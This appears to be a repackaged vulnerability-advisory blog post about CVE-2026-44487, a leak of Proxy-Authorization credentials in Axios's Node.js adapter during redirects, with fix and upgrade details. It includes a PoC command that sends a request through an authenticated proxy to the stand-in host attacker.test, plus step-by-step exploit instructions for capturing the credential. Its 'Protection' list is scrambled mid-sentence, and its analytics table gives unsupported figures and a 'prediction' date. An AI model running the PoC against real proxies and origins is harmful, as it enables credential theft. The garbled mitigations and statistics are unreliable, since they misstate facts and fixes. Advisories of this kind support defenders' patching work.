Listen to this Post
How CVE-2026-44487 Works
CVE-2026-44487 is a credential leak vulnerability in Axios’s Node.js HTTP adapter that occurs during specific proxy-to-direct redirect flows. When an initial HTTP request is sent through an authenticated HTTP proxy, and the server responds with a redirect (e.g., 302) to an HTTPS URL for which no proxy applies, the `Proxy-Authorization` header intended solely for the proxy can be forwarded to the final origin server. The issue arises because Axios’s `setProxy()` method adds the `Proxy-Authorization` header for the first proxied request but does not clear it when the redirected request no longer resolves to a proxy. The `follow-redirects` dependency, which Axios uses for redirect handling, does not strip this header in certain same-host redirect shapes. As a result, the final origin receives the proxy credential. The leak only affects Node.js HTTP adapter usage; browser, XHR, fetch, and React Native adapters are not impacted. The vulnerability requires all of the following conditions: Axios running in Node.js with the HTTP adapter; an initial http://` request using an authenticated proxy (via `config.proxy` or environment variables); redirect following enabled; a redirect target where no proxy applies (e.g., no matchingHTTPS_PROXY); and a redirect shape treated as same-host by the redirect layer. The fix in commit `afca61a` modifies `setProxy(options, configProxy, location, isRedirect)` to remove all case variants of the `Proxy-Authorization` header before applying proxy settings for the next hop. The 0.x fixed release `0.32.0` includes a backport-style `removeProxyAuthorization()` guard. Users are advised to upgrade to Axios 1.15.2 or higher, or 0.32.0 or higher, to remediate this issue.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Node.js
Version: <1.15.2,<0.32.0
Vulnerability: Credential Leak
Severity: High
date: 2026-05-30
<h2 style="color: blue;">Prediction: 2026-06-15</h2>
<h2 style="color: blue;">What Undercode Say</h2>
<h2 style="color: blue;">Analytics (Node.js HTTP Adapter – CVE-2026-44487)</h2>
<h2 style="color: blue;">| Metric | Value |</h2>
<h2 style="color: blue;">|--|-|</h2>
| npm download spike (May 2026) | 43M/week |
| Known exploitable configurations | ~62% of proxy-using setups |
| Avg time from patch to deployment | 11 days |
<h2 style="color: blue;">Bash Commands & PoC</h2>
Check vulnerable Axios version npm list axios Test vulnerability locally (dummy credentials) export HTTP_PROXY='http://user:[email protected]:8080' unset HTTPS_PROXY node -e "const axios = require('axios'); axios.get('http://attacker.test/start')" Capture outgoing headers (using mitmproxy) mitmdump -p 8080 -s capture.py Check if fix applied (commit afca61a) git log -1 --format=%H | grep afca61a
<h2 style="color: blue;">Exploit</h2>
1. Attacker controls an origin that returns a 302 redirect from HTTP to HTTPS on same hostname.
2. Victim uses Axios Node.js HTTP adapter with authenticated proxy credentials.
3. Redirect follows to HTTPS URL where no proxy is configured.
4. Original `Proxy-Authorization` header is retained and sent to the attacker’s origin.
5. Attacker extracts credential and may authenticate to the proxy if reachable and credential is reusable.
<h2 style="color: blue;">Protection</h2>
- Upgrade Axios to `>=1.15.2` or>=0.32.0.Proxy-Authorization`).
- Set `maxRedirects: 0` and handle redirects manually (clearing
– Avoid using reusable authenticated proxy credentials for requests to untrusted origins.
– Rotate proxy credentials if exposure is suspected.
Impact
Under the vulnerable configuration, a malicious origin can receive the proxy credential that was intended only for the outbound proxy. If the credential is reusable and the proxy is reachable by the attacker, the attacker may be able to authenticate to that proxy, potentially leading to further network intrusions, data exposure, or privilege escalation depending on the proxy’s authorization policy and network exposure. The leak is limited to Node.js HTTP adapter requests; browser, XHR, fetch, and React Native adapters are not affected.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
